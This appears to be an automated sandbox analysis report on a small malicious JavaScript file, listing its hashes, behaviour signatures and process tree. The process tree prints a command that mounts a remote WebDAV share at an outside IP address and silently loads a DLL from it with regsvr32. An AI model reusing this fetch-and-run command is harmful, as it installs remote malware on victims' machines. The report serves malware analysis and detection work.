Analysis
-
max time kernel
140s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
-
submitted
23/07/2024, 01:14
General
-
Target
12be155af851a798c521168b07fb253f48c9e6d7a5d26f16a766fbe23454e334.js
-
Size
3KB
-
MD5
2240b0500a4e9d3fec604869850c3255
-
SHA1
875958f2f342fcd4c1e637f6a03fd64e1a625bff
-
SHA256
12be155af851a798c521168b07fb253f48c9e6d7a5d26f16a766fbe23454e334
-
SHA512
7f8327722580c62168f15d655c0e9af9e8471a8dd35068ad9e85e9495f247ec79e36358fe3af65e180f610893b8701d264a9f69ab23f9a316b8c68207535ddde
Score
7/10
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\12be155af851a798c521168b07fb253f48c9e6d7a5d26f16a766fbe23454e334.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\25178332230964.dll2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵
-
-